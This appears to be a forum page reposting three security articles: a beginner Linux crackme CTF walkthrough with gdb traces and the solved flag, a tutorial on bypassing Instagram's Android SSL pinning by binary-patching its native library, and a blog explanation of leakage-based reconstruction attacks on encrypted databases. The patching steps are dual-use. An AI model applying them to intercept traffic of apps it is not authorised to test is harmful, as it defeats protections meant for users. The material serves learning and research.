0xffffd274 --> 0x0 ESI: 0xf7f94000 --> 0x1d5d8c EDI: 0x0 EBP: 0xffffd238 --> 0x0 ESP: 0xffffd22c --> 0xffffd250 --> 0x2 EIP: 0x565561f9 (<main+16>: sub esp,0x1c) EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x565561f6 <main+13>: push esi 0x565561f7 <main+14>: push ebx 0x565561f8 <main+15>: push ecx => 0x565561f9 <main+16>: sub esp,0x1c 0x565561fc <main+19>: call 0x565560f0 <__x86.get_pc_thunk.bx> 0x56556201 <main+24>: add ebx,0x2dff 0x56556207 <main+30>: mov esi,ecx 0x56556209 <main+32>: mov DWORD PTR [ebp-0x1c],0x0 [------------------------------------stack-------------------------------------] 0000| 0xffffd22c --> 0xffffd250 --> 0x2 0004| 0xffffd230 --> 0x0 0008| 0xffffd234 --> 0xf7f94000 --> 0x1d5d8c 0012| 0xffffd238 --> 0x0 0016| 0xffffd23c --> 0xf7dd79a1 (<__libc_start_main+241>: add esp,0x10) 0020| 0xffffd240 --> 0xf7f94000 --> 0x1d5d8c 0024| 0xffffd244 --> 0xf7f94000 --> 0x1d5d8c 0028| 0xffffd248 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x565561f9 in main () 1: main = {<text variable, no debug info>} 0x565561e9 <main> 2: puts = {<text variable, no debug info>} 0xf7e25e40 <puts> gdb-peda$ If you play with gdb for a little you realize how it works. Let’s try to understand the logic part by part. The program first tries to compare the number of arguments. It’s stored in ecx register and moved to esi and it’s used to compare the value with 0x2. You can use gdb to go through the assembly instructions and understand better. 0x56556207 <+30>: mov esi,ecx 0x56556209 <+32>: mov DWORD PTR [ebp-0x1c],0x0 0x56556210 <+39>: mov DWORD PTR [ebp-0x24],0x7 0x56556217 <+46>: cmp DWORD PTR [esi],0x2 0x5655621a <+49>: je 0x56556238 <main+79> 0x5655621c <+51>: sub esp,0xc 0x5655621f <+54>: lea eax,[ebx-0x1ff8] 0x56556225 <+60>: push eax 0x56556226 <+61>: call 0x56556040 <printf@plt> 0x5655622b <+66>: add esp,0x10 0x5655622e <+69>: sub esp,0xc 0x56556231 <+72>: push 0x1 0x56556233 <+74>: call 0x56556060 <exit@plt> We can write pseudo code like this. 1 2 3 4 if(argc != 2) { printf("Usage: script.exe <key>"); exit(1); } 0x56556238 <+79>: mov eax,DWORD PTR [esi+0x4] 0x5655623b <+82>: add eax,0x4 0x5655623e <+85>: mov eax,DWORD PTR [eax] 0x56556240 <+87>: sub esp,0xc 0x56556243 <+90>: push eax 0x56556244 <+91>: call 0x56556070 <strlen@plt> 0x56556249 <+96>: add esp,0x10 0x5655624c <+99>: cmp eax,0xf 0x5655624f <+102>: jbe 0x5655626d <main+132> 0x56556251 <+104>: sub esp,0xc 0x56556254 <+107>: lea eax,[ebx-0x1fe0] 0x5655625a <+113>: push eax 0x5655625b <+114>: call 0x56556050 <puts@plt> 0x56556260 <+119>: add esp,0x10 0x56556263 <+122>: sub esp,0xc 0x56556266 <+125>: push 0x1 0x56556268 <+127>: call 0x56556060 <exit@plt> After translating: 1 2 3 4 if(strlen(argv[1]) > 15) { puts("Length of argv[1] too long."); exit(1); } If you check this code we can see there is a loop going through iterating each character of our supplied string. 0x5655626d <+132>: mov DWORD PTR [ebp-0x20],0x0 0x56556274 <+139>: jmp 0x56556290 <main+167> 0x56556276 <+141>: mov eax,DWORD PTR [esi+0x4] 0x56556279 <+144>: add eax,0x4 0x5655627c <+147>: mov edx,DWORD PTR [eax] 0x5655627e <+149>: mov eax,DWORD PTR [ebp-0x20] 0x56556281 <+152>: add eax,edx 0x56556283 <+154>: movzx eax,BYTE PTR [eax] 0x56556286 <+157>: movsx eax,al 0x56556289 <+160>: add DWORD PTR [ebp-0x1c],eax 0x5655628c <+163>: add DWORD PTR [ebp-0x20],0x1 0x56556290 <+167>: mov eax,DWORD PTR [ebp-0x20] 0x56556293 <+170>: cmp eax,DWORD PTR [ebp-0x24] 0x56556296 <+173>: jl 0x56556276 <main+141> 0x56556298 <+175>: cmp DWORD PTR [ebp-0x1c],0x321 0x5655629f <+182>: jne 0x565562bb <main+210> 0x565562a1 <+184>: call 0x565562d9 <comp_key> 0x565562a6 <+189>: sub esp,0x8 0x565562a9 <+192>: push eax 0x565562aa <+193>: lea eax,[ebx-0x1fc4] 0x565562b0 <+199>: push eax 0x565562b1 <+200>: call 0x56556040 <printf@plt> 0x565562b6 <+205>: add esp,0x10 0x565562b9 <+208>: jmp 0x565562cd <main+228> 0x565562bb <+210>: sub esp,0xc 0x565562be <+213>: lea eax,[ebx-0x1fa2] 0x565562c4 <+219>: push eax 0x565562c5 <+220>: call 0x56556050 <puts@plt> 0x565562ca <+225>: add esp,0x10 0x565562cd <+228>: nop 0x565562ce <+229>: lea esp,[ebp-0xc] 0x565562d1 <+232>: pop ecx 0x565562d2 <+233>: pop ebx 0x565562d3 <+234>: pop esi 0x565562d4 <+235>: pop ebp 0x565562d5 <+236>: lea esp,[ecx-0x4] 0x565562d8 <+239>: ret Up to how many characters does it loop? Here’s how I found it. Basically, our password must be of 7 characters in length. [----------------------------------registers-----------------------------------] EAX: 0x6 EBX: 0x56559000 --> 0x3efc ECX: 0x6 EDX: 0xffffd4c6 ("1234567890") ESI: 0xffffd250 --> 0x2 EDI: 0x0 EBP: 0xffffd238 --> 0x0 ESP: 0xffffd210 --> 0xf7f943fc --> 0xf7f95200 --> 0x0 EIP: 0x56556293 (<main+170>: cmp eax,DWORD PTR [ebp-0x24]) EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x56556289 <main+160>: add DWORD PTR [ebp-0x1c],eax 0x5655628c <main+163>: add DWORD PTR [ebp-0x20],0x1 0x56556290 <main+167>: mov eax,DWORD PTR [ebp-0x20] => 0x56556293 <main+170>: cmp eax,DWORD PTR [ebp-0x24] 0x56556296 <main+173>: jl 0x56556276 <main+141> 0x56556298 <main+175>: cmp DWORD PTR [ebp-0x1c],0x321 0x5655629f <main+182>: jne 0x565562bb <main+210> 0x565562a1 <main+184>: call 0x565562d9 <comp_key> [------------------------------------stack-------------------------------------] 0000| 0xffffd210 --> 0xf7f943fc --> 0xf7f95200 --> 0x0 0004| 0xffffd214 --> 0x7 0008| 0xffffd218 --> 0x6 0012| 0xffffd21c --> 0x135 0016| 0xffffd220 --> 0x2 0020| 0xffffd224 --> 0xffffd2e4 --> 0xffffd487 ("/mnt/hgfs/shared/Linux RE/nix_5744af788e6cbdb29bb41e8b0e5f3cd5") 0024| 0xffffd228 --> 0xffffd2f0 --> 0xffffd4d1 ("NVM_DIR=/root/.nvm") 0028| 0xffffd22c --> 0xffffd250 --> 0x2 [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x56556293 in main () gdb-peda$ print $ebp-0x24 $24 = (void *) 0xffffd214 gdb-peda$ x/x 0xffffd214 0xffffd214: 0x00000007 After translating to high-level code, it would look something similar to this. 1 2 3 for (i = 0; i < 7; i++) value += argv[1]; if (value != 801) return puts("\n[+] No flag for you. [+]"); return printf("[+] The flag is: SAYCURE{%s} [+]\n", comp_key()); Basically, the sum of each byte of our password must be equal to 801. Givens us 7 characters, we can sum up like this. You can use any calculation which sums up to 801. After this check is done it calls the comp_key function and prints out the flag. We don’t really need to dig the com_key function as it directly gives us the flag. 114 * 6 + 177 = 801 Let’s check those characters in the ASCII table. 114 is ‘r’ and 117 is ‘u’. Dec Hex Dec Hex Dec Hex Dec Hex Dec Hex Dec Hex Dec Hex Dec Hex 0 00 NUL 16 10 DLE 32 20 48 30 0 64 40 @ 80 50 P 96 60 ` 112 70 p 1 01 SOH 17 11 DC1 33 21 ! 49 31 1 65 41 A 81 51 Q 97 61 a 113 71 q 2 02 STX 18 12 DC2 34 22 " 50 32 2 66 42 B 82 52 R 98 62 b 114 72 r 3 03 ETX 19 13 DC3 35 23 # 51 33 3 67 43 C 83 53 S 99 63 c 115 73 s 4 04 EOT 20 14 DC4 36 24 $ 52 34 4 68 44 D 84 54 T 100 64 d 116 74 t 5 05 ENQ 21 15 NAK 37 25 % 53 35 5 69 45 E 85 55 U 101 65 e 117 75 u 6 06 ACK 22 16 SYN 38 26 & 54 36 6 70 46 F 86 56 V 102 66 f 118 76 v 7 07 BEL 23 17 ETB 39 27 ' 55 37 7 71 47 G 87 57 W 103 67 g 119 77 w 8 08 BS 24 18 CAN 40 28 ( 56 38 8 72 48 H 88 58 X 104 68 h 120 78 x 9 09 HT 25 19 EM 41 29 ) 57 39 9 73 49 I 89 59 Y 105 69 i 121 79 y 10 0A LF 26 1A SUB 42 2A * 58 3A : 74 4A J 90 5A Z 106 6A j 122 7A z 11 0B VT 27 1B ESC 43 2B + 59 3B ; 75 4B K 91 5B [ 107 6B k 123 7B { 12 0C FF 28 1C FS 44 2C , 60 3C < 76 4C L 92 5C \ 108 6C l 124 7C | 13 0D CR 29 1D GS 45 2D - 61 3D = 77 4D M 93 5D ] 109 6D m 125 7D } 14 0E SO 30 1E RS 46 2E . 62 3E > 78 4E N 94 5E ^ 110 6E n 126 7E ~ 15 0F SI 31 1F US 47 2F / 63 3F ? 79 4F O 95 5F _ 111 6F o 127 7F DEL That’s it! We just solved a very simple binary # ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 rrrrrru [+] The flag is: SAYCURE{L3ts_g3t_in2_R3} [+] Check out my previous CTF solution posts here Birthday Crackme/ Rootme No software breakpoints Cracking Challenge Solving Root-me Ptrace challenge https://asciinema.org/~Osanda References http://www.cirosantilli.com/elf-hello-world/ Sursa: https://osandamalith.com/2019/02/11/linux-reverse-engineering-ctfs-for-beginners/
-
- 3
-
-
-
How to bypass Instagram SSL Pinning on Android (v78) 9 February 2019 Marco Genovese My goal was to take a look at the HTTP requests that Instagram was making but, after setting an HTTP proxy, I couldn’t see anything. Turns out that Instagram is protected against MITM attacks using a technique called certificate validation (SSL Pinning) which compares the certificate provided by server in the TLS handshake with a trusted one embedded in APK. Instagram refuses to complete TLS handshake if certificate doesn’t match This article is based on Instagram APK version 78.0.0.11.104 (x86) which you can download here. I am also using an Android 8.0 emulator with adb running as root. Disclaimer The sole purpose of this article is educational and for testing of your own applications. This is not intended for piracy or any other non-legal use. Setting up Burp to work with TLS 1.3 Facebook deployed TLS 1.3 at very large scale with their open source library Fizz. It doesn’t surprise me that they decided to use it on their Instagram application to make internet traffic more secure. This time I decided to use Burp to capture requests that Instagram app is making. After setting up the proxy, some weird alert appears in the Alerts tab. What is this weird “no cipher suites in common” message? Looks like this version of Burp does not support TLSv1.3 cipher suites. We can verify this by going to Project Options > SSL and list all ciphers. A simple solution to this problem is to run Burp with the latest version of JDK. At that point, you can run burpsuite_community.jar with the newly extracted java binary taken from JDK: ./Downloads/jdk-11.0.2.jdk/Contents/Home/bin/java -jar burpsuite_community.jar This time after opening Instagram app we get a different message from Alerts tab. Now we get a different (fatal) alert: bad_certificate which tells us that the certificate provided by Burp is not accepted by the client. We have to dig deeper into the app internals to get around this issue. Patching Native Layer Android applications can interact with native (C/C++) code using Java Native Interface (JNI). You can read more about it here. Instagram loads many native libraries from /data/data/com.instagram.android/lib-zstd which is created after the first app launch. ~ adb pull /data/data/com.instagram.android/lib-zstd ~ grep lib-zstd -re fizz Binary file lib-zstd/libliger.so matches Bingo! Let’s launch IDA Pro to take a look at this shared object file. After reading source code, I spotted the exception which was causing this bad_certificate issue. fizz > ClientProtocol.cpp Let’s search for strings using IDA (View > Open Subviews > Strings). At offset 002831F4 on read-only section (.rodata) we can see the constant we were looking for. IDA is pointing us to the subroutine sub_3C864 which using it. After analysing the flow, we can apply a simple patch at offset 0003CD4D patching JNZ to JZ so exception is no longer thrown! Let’s apply the patches (Edit > Patch Program > Apply patches to input file) and push the newly patched libliger.so to the device. adb push libliger.so /data/data/com.instagram.android/lib-zstd/libliger.so Now Burp complains with a weird alert: That’s weird. Analysing traffic with Wireshark didn’t help much and gave me no additional clues. Next step was to debug Android smali code using Android Studio (you can find an useful article here). I followed this StackOverflow reply to catch any exception and this shows up shortly after: This looks interesting. Let’s go back to IDA and search for the string constant “openssl cert verify error“. Match on offset 00295732 used by subroutine sub_176434. Similarly to what we’ve dove before, we can patch this subroutine to avoid throwing this exception. Patch JNZ to JZ, apply to input file and open Burp. Jackpot! We can now be the man in the middle and take a look at the “private” Instagram API. Sursa: https://plainsec.org/how-to-bypass-instagram-ssl-pinning-on-android-v78/
- 1 reply
-
- 1
-
-
Attack of the week: searchable encryption and the ever-expanding leakage function A few days ago I had the pleasure of hosting Kenny Paterson, who braved snow and historic cold (by Baltimore standards) to come talk to us about encrypted databases. Kenny’s newest result is with first authors Paul Grubbs, Marie-Sarah Lacharité and Brice Minaud (let’s call it GLMP). It isn’t so much about building encrypted databases, as it is about the risks of building them badly. And — for reasons I will get into shortly — there have been a lot of badly-constructed encrypted database schemes going around. What GLMP point out is that this weakness isn’t so much a knock against the authors of those schemes, but rather, an indication that they may just be trying to do the impossible. Hopefully this is a good enough start to get you drawn in. Which is excellent, because I’m going to need to give you a lot of background. What’s an “encrypted” database, and why are they a problem? Databases (both relational and otherwise) are a pretty important part of the computing experience. Modern systems make vast use of databases and their accompanying query technology in order to power just about every software application we depend on. Because these databases often contain sensitive information, there has been a strong push to secure that data. A key goal is to encrypt the contents of the database, so that a malicious database operator (or a hacker) can’t get access to it if they compromise a single machine. If we lived in a world where security was all that mattered, the encryption part would be pretty easy: database records are, after all, just blobs of data — and we know how to encrypt those. So we could generate a cryptographic key on our local machine, encrypt the data before we upload it to a vulnerable database server, and just keep that key locally on our client computer. Voila: we’re safe against a database hack! The problem with this approach is that encrypting the database records leaves us with a database full of opaque, unreadable encrypted junk. Since we have the decryption key on our client, we can decrypt and read those records after we’ve downloaded them. But this approach completely disables one of the most useful features of modern databases: the ability for the database server itself to search (or query) the database for specific records, so that the client doesn’t have to. Unfortunately, standard encryption borks search capability pretty badly. If I want to search a database for, say, employees whose salary is between $50,000 and $100,000, my database is helpless: all it sees is row after row of encrypted gibberish. In the worst case, the client will have to download all of the data rows and search them itself — yuck. This has led to much wailing and gnashing of teeth in the database community. As a result, many cryptographers (and a distressing number of non-cryptographers) have tried to fix the problem with “fancier” crypto. This has not gone very well. It would take me a hundred years to detail all of various solutions that have been put forward. But let me just hit a few of the high points: Some proposals have suggested using deterministic encryption to encrypt database records. Deterministic encryption ensures that a given plaintext will always encrypt to a single ciphertext value, at least for a given key. This enables exact-match queries: a client can simply encrypt the exact value (“John Smith”) that it’s searching for, and ask the database to identify encrypted rows that match it. Of course, exact-match queries don’t support more powerful features. Most databases also need to support range queries. One approach to this is something called order revealing encryption (or its weaker sibling, order preserving encryption). These do exactly what they say they do: they allow the database to compare two encrypted records to determine which plaintext is greater than the other. Some people have proposed to use trusted hardware to solve these problems in a “simpler” way, but as we like to say in cryptography: if we actually had trusted hardware, nobody would pay our salaries. And, speaking more seriously, even hardware might not stop the leakage-based attacks discussed below. This summary barely scratches the surface of this problem, and frankly you don’t need to know all the details for the purpose of this blog post. What you do need to know is that each of the above proposals entails has some degree of “leakage”. Namely, if I’m an attacker who is able to compromise the database, both to see its contents and to see how it responds when you (a legitimate user) makes a query, then I can learn something about the data being queried. What some examples of leakage, and what’s a leakage function? Leakage is a (nearly) unavoidable byproduct of an encrypted database that supports queries. It can happen when the attacker simply looks at the encrypted data, as she might if she was able to dump the contents of your database and post them on the dark web. But a more powerful type of leakage occurs when the attacker is able to compromise your database server and observe the query interaction between legitimate client(s) and your database. Take deterministic encryption, for instance. Deterministic encryption has the very useful, but also unpleasant feature that the same plaintext will always encrypt to the same ciphertext. This leads to very obvious types of leakage, in the sense that an attacker can see repeated records in the dataset itself. Extending this to the active setting, if a legitimate client queries on a specific encrypted value, the attacker can see exactly which records match the attacker’s encrypted value. She can see how often each value occurs, which gives and indication of what value it might be (e.g., the last name “Smith” is more common than “Azriel”.) All of these vectors leak valuable information to an attacker. Other systems leak more. Order-preserving encryption leaks the exact order of a list of underlying records, because it causes the resulting ciphertexts to have the same order. This is great for searching and sorting, but unfortunately it leaks tons of useful information to an attacker. Indeed, researchers have shown that, in real datasets, an ordering can be combined with knowledge about the record distribution in order to (approximately) reconstruct the contents of an encrypted database. Fancier order-revealing encryption schemes aren’t quite so careless with your confidentiality: they enable the legitimate client to perform range queries, but without leaking the full ordering so trivially. This approach can leak less information: but a persistent attacker will still learn some data from observing a query and its response — at a minimum, she will learn which rows constitute the response to a query, since the database must pack up the matching records and send them over to the client. If you’re having trouble visualizing what this last type of leakage might look like, here’s a picture that shows what an attacker might see when a user queries an unencrypted database vs. what the attacker might see with a really “good” encrypted database that supports range queries: So the TL;DR here is that many encrypted database schemes have some sort of “leakage”, and this leakage can potentially reveal information about (a) what a client is querying on, and (b) what data is in the actual database. But surely cryptographers don’t build leaky schemes? Sometimes the perfect is the enemy of the good. Cryptographers could spend a million years stressing themselves to death over the practical impact of different types of leakage. They could also try to do things perfectly using expensive techniques like fully-homomorphic encryption and oblivious RAM — but the results would be highly inefficient. So a common view in the field is researchers should do the very best we can, and then carefully explain to users what the risks are. For example, a real database system might provide the following guarantee: “Records are opaque. If the user queries for all records BETWEEN some hidden values X AND Y then all the database will learn is the row numbers of the records that match this range, and nothing else.” This is a pretty awesome guarantee, particularly if you can formalize it and prove that a scheme achieves it. And indeed, this is something that researchers have tried to do. The formalized description is typically achieved by defining something called a leakage function. It might not be possible to prove that a scheme is absolutely private, but we can prove that it only leaks as much as the leakage function allows. Now, I may be overdoing this slightly, but I want to be very clear about this next part: Proving your encrypted database protocol is secure with respect to a specific leakage function does not mean it is safe to use in practice. What it means is that you are punting that question to the application developer, who is presumed to know how this leakage will affect their dataset and their security needs. Your leakage function and proof simply tell the app developer what information your scheme is (provably) going to protect, and what it won’t. The obvious problem with this approach is that application developers probably don’t have any idea what’s safe to use either. Helping them to figure this out is one goal of this new GLMP paper and its related work. So what leaks from these schemes? GLMP don’t look at a specific encryption scheme. Rather, they ask a more general question: let’s imagine that we can only see that a legitimate user has made a range query — but not what the actual queried range values are. Further, let’s assume we can also see which records the database returns for that query, but not their actual values. How much does just this information tell us about the contents of the database? You can see that this is a very limited amount of leakage. Indeed, it is possibly the least amount of leakage you could imagine for any system that supports range queries, and is also efficient. So in one sense, you could say authors are asking a different and much more important question: are any of these encrypted databases actually secure? The answer is somewhat worrying. Can you give me a simple, illuminating example? Let’s say I’m an attacker who has compromised a database, and observes the following two range queries/results from a legitimate client: Query 1: SELECT * FROM Salaries BETWEEN and Result 1: (rows 1, 3, 5) Query 2: SELECT * FROM Salaries BETWEEN and Result 2: (rows 1, 43, 3, 5) Here I’m using the emoji to illustrate that an attacker can’t see the actual values submitted within the range queries — those are protected by the scheme — nor can she see the actual values of the result rows, since the fancy encryption scheme hides all this stuff. All the attacker sees is that a range query came in, and some specific rows were scooped up off disk after running the fancy search protocol. So what can the attacker learn from the above queries? Surprisingly: quite a bit. At very minimum, the attacker learns that Query 2 returned all of the same records as Query 1. Thus the range of the latter query clearly somewhat overlaps with the range of the former. There is an additional record (row 43) that is not within the range of Query 1. That tells us that row 43 must must be either the “next” greater or smaller record than each of rows (1, 3, 5). That’s useful information. Get enough useful information, it turns out that it starts to add up. In 2016, Kellaris, Kollios, Nissim and O’Neill showed that if you know the distribution of the query range endpoints — for example, if you assumed that they were uniformly random — then you can get more than just the order of records. You can reconstruct the exact value of every record in the database. This result is statistical in nature. If I know that the queries are uniformly random, then I can model how often a given value (say, Age=34 out of a range 1-120) should be responsive to a given random query results. By counting the actual occurrences of a specific row after many such queries, I can guess which rows correlate to specific record values. The more queries I see, the more certain I can be.The Kellaris et al. paper shows that this takes queries, where N is the number of possible values your data can take on (e.g., the ages of your employees, ranging between 1 and 100 would give N=100.) This is assuming an arbitrary dataset. The results get much better if the database is “dense”, meaning every possible value occurs once. In practice the Kellaris et al. results mean that database fields with small domains (like ages) could be quickly reconstructed after observing a reasonable number of queries from a legitimate user, albeit one who likes to query everything randomly. So that’s really bad! The main bright spot in this research —- at least up until recently — was that many types of data have much larger domains. If you’re dealing with salary data ranging from, say, $1 to $200,000, then N=200,000 and this dominant tends to make Kellaris et al. attacks impractical, simply because they’ll take too long. Similarly, data like employee last names (encoded as a form that can be sorted and range-queries) gives you even vaster domains like , say, and so perhaps we could pleasantly ignore these results and spend our time on more amusing engagements. I bet we can’t ignore these results, can we? Indeed, it seems that we can’t. The reason we can’t sit on our laurels and hope for an attacker to die of old age recovering large-domain data sets is due to something called approximate database reconstruction, or ADR. The setting here is the same: an attacker sits and watches an attacker make (uniformly random) range queries. The critical difference is that this attacker isn’t trying to get every database record back at its exact value: she’s willing to tolerate some degree of error, up to an additive . For example, if I’m trying to recover employee salaries, I don’t need them to be exact: getting them within 1% or 5% is probably good enough for my purposes. Similarly, reconstructing nearly all of the letters in your last name probably lets me guess the rest, especially if I know the distribution of common last names. Which finally brings us to this new GLMP paper, which puts ADR on steroids. What it shows is that the same setting, if one is willing to “sacrifice” a few of the highest and lowest values in the database, an attacker can reconstruct nearly the full database in a much smaller (asymptotic) number of queries, specifically: queries, where is the error parameter. The important thing to notice about these results is that the value N has dropped out of the equation. The only term that’s left is the error term . That means these results are “scale-free”, and (asymptotically, at least), they work just as well for small values of N as large ones, and large databases and small ones. This is really remarkable. Big-O notation doesn’t do anything for me: what does this even mean? Big-O notation is beloved by computer scientists, but potentially meaningless in practice. There could be huge constants in these terms that render these attacks completely impractical. Besides, weird equations involving epsilon characters are impossible for humans to understand. Sometimes the easiest way to understand a theoretical result is to plug some actual numbers in and see what happens. GLMP were kind enough to do this for us, by first generating several random databases — each containing 1,000 records, for different values of N. They then ran their recovery algorithm against a simulated batch of random range queries to see what the actual error rate looked like as the query count increased. Here are their results: Experimental results (Figure 2) from Grubbs et al. (GLMP, 2019). The Y-axis represents the measured error between the reconstructed database and the actual dataset (smaller is better.) The X-axis represents the number of queries. Each database contains 1,000 records, but there are four different values of N tested here. Notice that the biggest error occurs around the very largest and smallest values in the dataset, so the results are much better if one is willing to “sacrifice” these values. Even after just 100 queries, the error in the dataset has been hugely reduced, and after 500 queries the contents of the database — excluding the tails — can be recovered with only about a 1-2% error rate. Moreover, these experimental results illustrate the fact that recovery works at many scales: that is, they work nearly as well for very different values of N, ranging from 100 to 100,000. This means that the only variable you really need to think about as an attacker is: how close do I need my reconstruction to be? This is probably not very good news for any real data set. How do these techniques actually work? The answer is both very straightforward and deeply complex. The straightforward part is simple; the complex part requires an understanding of Vapnik-Chervonenkis learning theory (VC-theory) which is beyond the scope of this blog post, but is explained in the paper. At the very highest level the recovery approach is similar to what’s been done in the past: using response probabilities to obtain record values. This paper does it much more efficiently and approximately, using some fancy learning theory results while making a few assumptions. At the highest level: we are going to assume that the range queries are made on random endpoints ranging from 1 to N. This is a big assumption, and more on it later! Yet with just this knowledge in hand, we learn quite a bit. For example: we can compute the probability that a potential record value (say, the specific salary $34,234) is going to be sent back, provided we know the total value lies in the range 1-N (say, we know all salaries are between $1 and $200,000). If we draw the resulting probability curve in freehand, it might look something like the chart below. This isn’t actually to scale or (probably) even accurate, but it illustrates a key point: by the nature of (random) range queries, records near the center are going to have a higher overall chance of being responsive to any given query, since the “center” values are more frequently covered by random ranges, and records near the extreme high- and low values will be chosen less frequently. I drew this graph freehand to mimic a picture in Kenny’s slides. Not a real plot! The high-level goal of database reconstruction is to match the observed response rate for a given row (say, row 41) to the number of responses we’d expect see for different specific concrete values in the range. Clearly the accuracy of this approach is going to depend on the number of queries you, the attacker, can observe — more is better. And since the response rates are lower at the highest and lowest values, it will take more queries to guess outlying data values. You might also notice that there is one major pitfall here. Since the graph above is symmetric around its midpoint, the expected response rate will be the same for a record at .25*N and a record at .75*N — that is, a $50,000 salary will be responsive to random queries at precisely same rate as a $150,000 salary. So even if you get every database row pegged precisely to its response rate, your results might still be “flipped” horizontally around the midpoint. Usually this isn’t the end of the world, because databases aren’t normally full of unstructured random data — high salaries will be less common than low salaries in most organizations, for example, so you can probably figure out the ordering based on that assumption. But this last “bit” of information is technically not guaranteed to come back, minus some assumptions about the data set. Thus, the recovery algorithm breaks down into two steps: first, observe the response rate for each record as random range queries arrive. For each record that responds to such a query, try to solve for a concrete value that minimizes the difference between the expected response rate on that value, and the observed rate. The probability estimation can be made more efficient (eliminating a quadratic term) by assuming that there is at least one record in the database within the range .2N-.3N (or .7N-.8N, due to symmetry). Using this “anchor” record requires a mild assumption about the database contents. What remains is to show that the resulting attack is efficient. You can do this by simply implementing it — as illustrated by the charts above. Or you can prove that it’s efficient. The GLMP paper uses some very heavy statistical machinery to do the latter. Specifically, they make use of a result from Vapnik-Chervonenkis learning theory (VC-theory), which shows that the bound can be derived from something called the VC-dimension (which is a small number, in this case) and is unrelated to the actual value of N. That proof forms the bulk of the result, but the empirical results are also pretty good. Is there anything else in the paper? Yes. It gets worse. There’s so much in this paper that I cannot possibly include it all here without risking carpal tunnel and boredom, and all of it is bad news for the field of encrypted databases. The biggest additional result is one that shows that if all you want is an approximate ordering of the database rows, then you can do this efficiently using something called a PQ tree. Asymptotically, this requires queries, and experimentally the results are again even better than one would expect. What’s even more important about this ordering result is that it works independently of the query distribution. That is: we do not need to have random range queries in order for this to work: it works reasonably well regardless of how the client puts its queries together (up to a point). Even better, the authors show that this ordering, along with some knowledge of the underlying database distribution — for example, let’s say we know that it consists of U.S. citizen last names — can also be used to obtain approximate database reconstruction. Oy vey! And there’s still even more: The authors show how to obtain even more efficient database recovery in a setting where the query range values are known to the attacker, using PAC learning. This is a more generous setting than previous work, but it could be realistic in some cases. Finally, they extend this result to prefix and suffix queries, as well as range queries, and show that they can run their attacks on a dataset from the Fraternal Order of Police, obtaining record recovery in a few hundred queries. In short: this is all really bad for the field of encrypted databases. So what do we do about this? I don’t know. Ignore these results? Fake our own deaths and move into a submarine? In all seriousness: database encryption has been a controversial subject in our field. I wish I could say that there’s been an actual debate, but it’s more that different researchers have fallen into different camps, and nobody has really had the data to make their position in a compelling way. There have actually been some very personal arguments made about it. The schools of thought are as follows: The first holds that any kind of database encryption is better than storing records in plaintext and we should stop demanding things be perfect, when the alternative is a world of constant data breaches and sadness. To me this is a supportable position, given that the current attack model for plaintext databases is something like “copy the database files, or just run a local SELECT * query”, and the threat model for an encrypted database is “gain persistence on the server and run sophisticated statistical attacks.” Most attackers are pretty lazy, so even a weak system is probably better than nothing. The countervailing school of thought has two points: sometimes the good is much worse than the perfect, particularly if it gives application developers an outsized degree of confidence of the security that their encryption system is going to provide them. If even the best encryption protocol is only throwing a tiny roadblock in the attacker’s way, why risk this at all? Just let the database community come up with some kind of ROT13 encryption that everyone knows to be crap and stop throwing good research time into a problem that has no good solution. I don’t really know who is right in this debate. I’m just glad to see we’re getting closer to having it. Sursa: https://blog.cryptographyengineering.com/2019/02/11/attack-of-the-week-searchable-encryption-and-the-ever-expanding-leakage-function/